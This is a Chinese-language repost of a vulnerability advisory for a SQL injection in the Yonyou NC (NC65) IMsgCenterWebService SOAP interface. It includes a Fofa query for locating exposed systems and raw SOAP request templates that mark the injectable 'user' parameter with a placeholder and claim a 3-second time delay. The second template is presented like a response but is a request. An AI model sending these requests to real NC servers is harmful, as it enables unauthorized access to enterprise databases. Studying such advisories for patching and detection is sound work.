2026-05-23 05:09:37 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 用友NC系统IMsgCenterWebService接口存在SQL注入漏洞，因未对输入参数进行严格过滤，攻击者可通过构造恶意SQL语句导致敏感信息泄露或数据库控制。影响NC65版本，提供具体复现步骤和Fofa语法，建议用户及时安装官方补丁加固防护。 综合评分： 75 文章分类： 漏洞分析,WEB安全,应急响应,解决方案,安全工具

cover_image

用友 NC 系统 IMsgCenterWebService SQL注入漏洞

0day收割机

2026年5月20日 13:18 山东

在小说阅读器读本章

去阅读

漏洞简介

用友 NC（Yonyou NC）是一款广泛应用于大型企业的集成化管理软件，涵盖财务、供应链、人力资源等核心业务管理功能。NC 系统的 IMsgCenterWebService 接口在处理请求时存在 SQL 注入漏洞，主要原因是该接口未对外部输入的参数进行严格的过滤与验证。攻击者可通过构造恶意的 SQL 语句并发送至该接口，从而与后端数据库进行非法交互，不仅可能导致系统敏感信息泄露，严重时还可能造成数据库内容被篡改甚至完全控制数据库服务器，对企业信息安全构成重大威胁。建议受影响用户及时关注厂商发布的官方通告，并根据系统版本部署相应的修复补丁以加固防护。

影响版本

NC65

fofa语法

app=”用友-UFIDA-NC”

漏洞复现

doAction

POST /uapws/service/nc.itf.msgcenter.IMsgCenterWebService HTTP/1.1
Host:
SOAPAction: urn:doAction
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ims="http://msgcenter.itf.nc/IMsgCenterWebService">
&nbsp; &nbsp;<soapenv:Header/>
&nbsp; &nbsp;<soapenv:Body>
&nbsp; &nbsp; &nbsp; <ims:doAction>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<!--type: string-->
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<dataSource>NC65</dataSource>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<!--type: string-->
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<actionCode>test</actionCode>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<!--type: string-->
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<pluginType>test</pluginType>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<!--type: string-->
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<param>{"user":"'SQLI_POC","pk_sourcemsg":""}</param>
&nbsp; &nbsp; &nbsp; </ims:doAction>
&nbsp; &nbsp;</soapenv:Body>
</soapenv:Envelope>

成功延时 3 秒

<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xmlns:ns="http://msgcenter.itf.nc/IMsgCenterWebService">
<soapenv:Header/>
<soapenv:Body>
<ns:queryMsgByUserAndType>
&nbsp; <dataSource>NC65</dataSource>
<param>{"user":"SQLI_POC","msgtype":"test","msgstatus":"","start":"","end":"","seach":"","seachSender":"","billtype":"","billno":"","billid":""}</param>
&nbsp; <pageSize>10</pageSize>
&nbsp; <index>0</index>
</ns:queryMsgByUserAndType>
</soapenv:Body>
</soapenv:Envelope>

成功延时 3 秒

仅供安全研究和学习使用。若因传播、利用本文档信息而产生任何直接或间接的后果或损害，均由使用者自行承担，文章作者不为此承担任何责任。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：0day收割机《用友 NC 系统 IMsgCenterWebService SQL注入漏洞》